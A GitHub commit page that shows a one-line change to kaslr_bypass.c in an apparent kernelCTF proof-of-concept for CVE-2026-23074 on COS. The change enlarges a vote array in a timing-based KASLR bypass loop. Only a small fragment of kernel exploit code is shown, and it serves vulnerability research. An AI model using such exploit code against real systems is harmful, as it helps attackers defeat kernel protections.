Skip to content

Commit ceda02d

Browse files
committed
test
1 parent 4b96751 commit ceda02d

File tree

1 file changed

+1
-1
lines changed
  • pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39

1 file changed

+1
-1
lines changed

pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/kaslr_bypass.c

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -67,7 +67,7 @@ int bypass_kaslr(uint64_t base) {
6767
#define END (0xffffffffD0000000ull + OFFSET)
6868
#define STEP 0x0000000001000000ull
6969
while (1) {
70-
uint64_t bases[5] = {0};
70+
uint64_t bases[7] = {0};
7171
for (int vote = 0; vote < ARRAY_LEN(bases); vote ++) {
7272
size_t times[(END - START) / STEP] = {};
7373
uint64_t addrs[(END - START) / STEP];

0 commit comments

Comments
 (0)